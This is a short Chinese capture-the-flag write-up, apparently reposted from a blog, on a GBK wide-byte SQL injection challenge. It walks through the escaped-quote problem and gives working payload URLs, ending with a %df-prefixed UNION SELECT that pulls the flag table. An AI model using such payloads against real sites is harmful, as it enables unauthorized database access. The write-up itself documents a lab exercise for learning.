打开就看见
执行的sql语句:SELECT id,title FROM news WHERE id=’1’
尝试闭合‘构造语句,发现无论怎么构造都会出现\
http://115.28.150.176/sqli/index.php?id=1’ select * from news
看来需要干掉/。尝试id ,发现id=2时出现提示
id: 2 title: gbk_sql_injection
看来是宽字节注入
可知当存在%df时就会吃掉\
多次尝试,最终构造
http://115.28.150.176/sqli/index.php?id=%df’ union select *,1 from flag%23
出现flag
原文:http://www.cnblogs.com/maodun/p/6915823.html